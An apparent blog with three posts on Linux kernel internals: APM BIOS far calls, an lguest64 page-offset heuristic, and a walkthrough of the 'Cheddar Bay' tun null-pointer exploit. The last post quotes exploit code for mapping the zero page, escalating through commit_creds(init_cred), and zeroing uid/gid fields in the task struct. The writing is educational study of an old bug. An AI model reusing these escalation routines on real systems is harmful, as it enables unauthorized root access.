Thanks to “Understanding the Linux Kernel”, I spent several hours trying to understand the code Linux uses to ‘call’ the APM BIOS through its 32-bit protected mode interface.
Of course, APM has been deprecated for ages, I think, but I was curious. 😛

As the APM 1.2 specification states:

The APM BIOS 32-bit protected mode interface requires 3 consecutive
selector/segment descriptors for use as 32-bit code, 16-bit code, and data segments,
respectively. Both 32-bit and 16-bit code segment descriptors are necessary so the
APM BIOS 32-bit interface can call other BIOS routines in a 16-bit code segment if
necessary. The caller must initialize these descriptors using the segment base and
length information returned from this call to the APM BIOS. These selectors may
either be in the GDT or LDT, but must be valid when the APM BIOS is called in
protected mode.

So, at boot time, Linux queries the APM BIOS for the base and length of the segments that the APM code uses (query_apm_bios()):

	/* 32-bit connect */
	ireg.al = 0x03;
	intcall(0x15, &ireg, &oreg);

	boot_params.apm_bios_info.cseg        = oreg.ax;
	boot_params.apm_bios_info.offset      = oreg.ebx;
	boot_params.apm_bios_info.cseg_16     = oreg.cx;
	boot_params.apm_bios_info.dseg        = oreg.dx;
	boot_params.apm_bios_info.cseg_len    = oreg.si;
	boot_params.apm_bios_info.cseg_16_len = oreg.hsi;
	boot_params.apm_bios_info.dseg_len    = oreg.di;

These are the values that Linux will use to set up the appropriate segments in the Global Descriptor Table (GDT).

	/*
	 * Set up the long jump entry point to the APM BIOS, which is called
	 * from inline assembly.
	 */
	apm_bios_entry.offset = apm_info.bios.offset;
	apm_bios_entry.segment = APM_CS;

	/*
	 * The APM 1.1 BIOS is supposed to provide limit information that it
	 * recognizes.  Many machines do this correctly, but many others do
	 * not restrict themselves to their claimed limit.  When this happens,
	 * they will cause a segmentation violation in the kernel at boot time.
	 * Most BIOS's, however, will respect a 64k limit, so we use that.
	 *
	 * Note we only set APM segments on CPU zero, since we pin the APM
	 * code to that CPU.
	 */
	gdt = get_cpu_gdt_table(0);
	set_desc_base(&gdt[APM_CS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg << 4));
	set_desc_base(&gdt[APM_CS_16 >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.cseg_16 << 4));
	set_desc_base(&gdt[APM_DS >> 3],
		 (unsigned long)__va((unsigned long)apm_info.bios.dseg << 4));

So, now the APM segments (or rather, their descriptors) are ready to use.
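
Two small bits of arithmetic are hiding in the set_desc_base() calls: `<< 4` turns a real-mode segment value into a linear base address, and `>> 3` turns a selector into a GDT index. Here is a minimal sketch of just that arithmetic. The helper names are mine, not the kernel's, and the __va() translation that the kernel applies on top of the base is left out.

```c
#include <stdint.h>

/* Hypothetical helper: linear base of a real-mode segment (segment * 16). */
static uint32_t real_mode_segment_base(uint16_t segment)
{
	return (uint32_t)segment << 4;
}

/*
 * Hypothetical helper: descriptor table index encoded in a selector.
 * The low 3 bits (2 RPL bits plus the table-indicator bit) are dropped.
 */
static unsigned int selector_to_index(uint16_t selector)
{
	return selector >> 3;
}
```

For example, a segment value of 0xF000 (picked only for illustration) gives a base of 0xF0000, and selector 0x10 refers to descriptor number 2.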

The code used to make an APM BIOS call looks like this:

static inline void apm_bios_call_asm(u32 func, u32 ebx_in, u32 ecx_in,
					u32 *eax, u32 *ebx, u32 *ecx,
					u32 *edx, u32 *esi)
{
	/*
	 * N.B. We do NOT need a cld after the BIOS call
	 * because we always save and restore the flags.
	 */
	__asm__ __volatile__(APM_DO_ZERO_SEGS
		"pushl %%edi\n\t"
		"pushl %%ebp\n\t"
		"lcall *%%cs:apm_bios_entry\n\t"
		"setc %%al\n\t"
		"popl %%ebp\n\t"
		"popl %%edi\n\t"
		: "=a" (*eax), "=b" (*ebx), "=c" (*ecx), "=d" (*edx),
		  "=S" (*esi)
		: "a" (func), "b" (ebx_in), "c" (ecx_in)
		: "memory", "cc");
}

It took me a while to figure out the far call

lcall *%%cs:apm_bios_entry

because apm_bios_entry is defined as:

static struct {
        unsigned long   offset;
        unsigned short  segment;
} apm_bios_entry;

At first I thought that the struct should be defined the other way around (first the segment and then the offset).
I experimented a bit with inline asm, and after lots of segmentation faults and some time going over the Intel x86 manuals on the ljmp instruction, I figured it out.

Well, I think it took much, much longer than it should have to understand what was going on. :S

ljmp (like lcall) expects a mem16:mem32 operand, where mem16 is the segment selector and mem32 is the offset. In memory, the 32-bit offset sits at the lower address and the 16-bit selector follows it.
And that’s exactly how the struct apm_bios_entry is laid out in memory (on 32-bit x86, unsigned long is 4 bytes).
However, as I ‘read’ mem16:mem32, I thought that mem16 should be stored before mem32. :S

And thus I lost several hours writing and experimenting with segfaulting C code. 😛
For something pretty obvious…
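
In hindsight, a few lines of C would have settled the layout question without any segfaults. The sketch below uses a hypothetical stand-in struct with fixed-width types (so it does not depend on unsigned long being 4 bytes) and simply reports where each field lives.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for apm_bios_entry, using fixed-width fields. */
struct far_pointer {
	uint32_t offset;	/* bytes 0..3: 32-bit offset, at the lower address */
	uint16_t segment;	/* bytes 4..5: 16-bit segment selector */
};

/* Byte position of the offset field inside the struct. */
static size_t far_pointer_offset_pos(void)
{
	return offsetof(struct far_pointer, offset);
}

/* Byte position of the segment field inside the struct. */
static size_t far_pointer_segment_pos(void)
{
	return offsetof(struct far_pointer, segment);
}
```

The offset field sits at byte 0 and the segment field at byte 4, which is the order an indirect far jump or call reads them in.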


Coolest hack/trick ever!

February 17, 2011

Some time ago, I wrote about lguest, a minimal x86 hypervisor for the Linux Kernel, which is mainly used for experimentation and for learning about hypervisors, operating systems, and even computer architecture/ISAs (x86 in particular).

Today I cloned the git repo for the lguest64 port and started browsing through the documentation and the code. In the launcher code (the program that sets up and launches a new guest kernel), I saw the coolest programming hack/trick I’ve seen in a long time. 😛

/*L:170 Prepare to be SHOCKED and AMAZED.  And possibly a trifle nauseated.
 * We know that CONFIG_PAGE_OFFSET sets what virtual address the kernel expects
 * to be.  We don't know what that option was, but we can figure it out
 * approximately by looking at the addresses in the code.  I chose the common
 * case of reading a memory location into the %eax register:
 *  movl <some-address>, %eax
 * This gets encoded as five bytes: "0xA1 <4-byte-address>".  For example,
 * "0xA1 0x18 0x60 0x47 0xC0" reads the address 0xC0476018 into %eax.
 * In this example can guess that the kernel was compiled with
 * CONFIG_PAGE_OFFSET set to 0xC0000000 (it's always a round number).  If the
 * kernel were larger than 16MB, we might see 0xC1 addresses show up, but our
 * kernel isn't that bloated yet.
 * Unfortunately, x86 has variable-length instructions, so finding this
 * particular instruction properly involves writing a disassembler.  Instead,
 * we rely on statistics.  We look for "0xA1" and tally the different bytes
 * which occur 4 bytes later (the "0xC0" in our example above).  When one of
 * those bytes appears three times, we can be reasonably confident that it
 * forms the start of CONFIG_PAGE_OFFSET.
 * This is amazingly reliable. */
static unsigned long intuit_page_offset(unsigned char *img, unsigned long len)
{
	unsigned int i, possibilities[256] = { 0 };

	for (i = 0; i + 4 < len; i++) {
		/* mov 0xXXXXXXXX,%eax */
		if (img[i] == 0xA1 && ++possibilities[img[i+4]] > 3)
			return (unsigned long)img[i+4] << 24;
	}
	errx(1, "could not determine page offset");
}

It’s very well commented, so I don’t think there’s anything I could explain any better.
Very very nice trick!
‘Prepare to be shocked and amazed!’ 😉
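
To play with the idea outside the launcher, here is a small standalone sketch of the same tallying loop. It is my own variant, not the lguest code: it returns 0 instead of calling errx() when no byte is seen often enough, and fill_example_image() is a hypothetical helper that builds a fake "kernel image" out of copies of the example instruction from the comment.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Same tallying idea as intuit_page_offset(): look for the 0xA1 opcode
 * and count the byte found 4 positions later (the top byte of the
 * address). Returns 0 if no candidate is seen more than 3 times.
 */
static uint32_t guess_page_offset(const unsigned char *img, size_t len)
{
	unsigned int tally[256] = { 0 };
	size_t i;

	for (i = 0; i + 4 < len; i++) {
		if (img[i] == 0xA1 && ++tally[img[i + 4]] > 3)
			return (uint32_t)img[i + 4] << 24;
	}
	return 0;
}

/*
 * Hypothetical helper: fill buf with `copies` back-to-back copies of
 * "0xA1 0x18 0x60 0x47 0xC0" and return the number of bytes written.
 * buf must hold at least copies * 5 bytes.
 */
static size_t fill_example_image(unsigned char *buf, size_t copies)
{
	static const unsigned char insn[5] = { 0xA1, 0x18, 0x60, 0x47, 0xC0 };
	size_t i, j;

	for (i = 0; i < copies; i++)
		for (j = 0; j < 5; j++)
			buf[i * 5 + j] = insn[j];
	return copies * 5;
}
```

Note that with the `> 3` test, a byte has to show up four times before it is accepted, so an image with only three copies of the instruction yields no guess.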

Gimme root!

February 17, 2011

I was looking at the Linux Kernel null-pointer dereference exploit for /dev/net/tun, aka Cheddar Bay :P, written by Brad Spengler, and I came across some things I hadn’t seen before.

In the pa__init function of the exploit, we try to mmap the zero page, and then we set it up accordingly in order to redirect to our “gimme root” code. 😛

The piece of code for the mmap looks like this:

	if ((personality(0xffffffff)) != PER_SVR4) {
		mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC,
			   MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
		}
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;
		}
	}

Thus, I learned that the SVR4 personality (and, more generally, any personality with the MMAP_PAGE_ZERO flag set) maps the zero page and fills it with zeros. That’s why the exploit uses mprotect instead of mmap for SVR4: the zero page is already mapped.
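
The flag itself is easy to inspect from userspace. Below is a minimal sketch, assuming Linux with glibc's <sys/personality.h>; the two helper names are mine. It relies on the same personality(0xffffffff) call as the excerpt above, which only queries the current personality and does not change it.

```c
#include <sys/personality.h>

/* Nonzero if the given personality value has MMAP_PAGE_ZERO set. */
static int maps_page_zero(unsigned long persona)
{
	return (persona & MMAP_PAGE_ZERO) != 0;
}

/* Same check for the calling process; 0xffffffff means "query only". */
static int current_process_maps_page_zero(void)
{
	return maps_page_zero((unsigned long)personality(0xffffffff));
}
```

PER_SVR4 includes MMAP_PAGE_ZERO in its definition, while the default PER_LINUX does not.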

The gimme-root code was also fun (spender did his best to mock SELinux :P). However, the code that actually gives us root credentials is only 3 lines:

	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		commit_creds(init_cred);
		got_root = 1;
	}

where init_cred is the credential struct used by init (aka root :P), and commit_creds points to the kernel function that installs a new set of credentials on the current task. spender gets the addresses of those symbols by parsing /proc/kallsyms. However, it seems that the init_cred symbol/struct is not exported, so maybe we could instead craft a new cred struct with uid/gid=0 and then call prepare_creds/commit_creds.

Afaik, this credential ‘framework’ was introduced with Linux Kernel 2.6.29, so spender provides another, ‘old-school’ 😛 way to get root credentials on older kernels:

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
	unsigned long current;

	asm volatile (
	" movl %%esp, %%eax;"
	" andl %1, %%eax;"
	" movl (%%eax), %0;"
	: "=r" (current)
	: "i" (0xfffff000)
	);
	return current;
}

static void old_style_gimme_root(void)
{
	unsigned int *current;
	unsigned long orig_current;

	current = (unsigned int *)get_current();
	orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
		(current[0] != our_uid || current[1] != our_uid ||
		 current[2] != our_uid || current[3] != our_uid))
		current++;

	if ((unsigned long)current >= (orig_current + 0x1000))
		return;

	current[0] = current[1] = current[2] = current[3] = 0; // uids
	current[4] = current[5] = current[6] = current[7] = 0; // gids

	got_root = 1;
}


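which masks the stack pointer to find the base of the current 4K kernel stack, reads the current task’s pointer stored there, and then scans the first 4K of that task structure for four consecutive copies of our uid. Once it finds them, it sets those four uid fields and the four gid fields that follow them to 0 (aka root :P).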
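
The `andl` with 0xfffff000 is plain alignment arithmetic: with 4K stacks that are 4K-aligned, clearing the low 12 bits of any address inside the stack gives the address of its base. A tiny sketch of just that step follows; the macro and function names are mine, and the 4K size is the assumption stated in the excerpt's own comment.

```c
#include <stdint.h>

/* Assumes 4 KiB stacks aligned on a 4 KiB boundary. */
#define STACK_MASK_4K 0xfffff000u

/* Base address of the 4 KiB stack that contains the stack pointer sp. */
static uint32_t stack_base_4k(uint32_t sp)
{
	return sp & STACK_MASK_4K;
}
```

So a stack pointer of 0xc1234abc (an address made up for illustration) maps to a base of 0xc1234000, no matter how deep into the stack we currently are.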

The exploit itself is brilliant, and LWN has two very nice articles that explain how it actually works (although spender has commented more than enough himself, on Linux Kernel security, full disclosure of security bugs, etc.).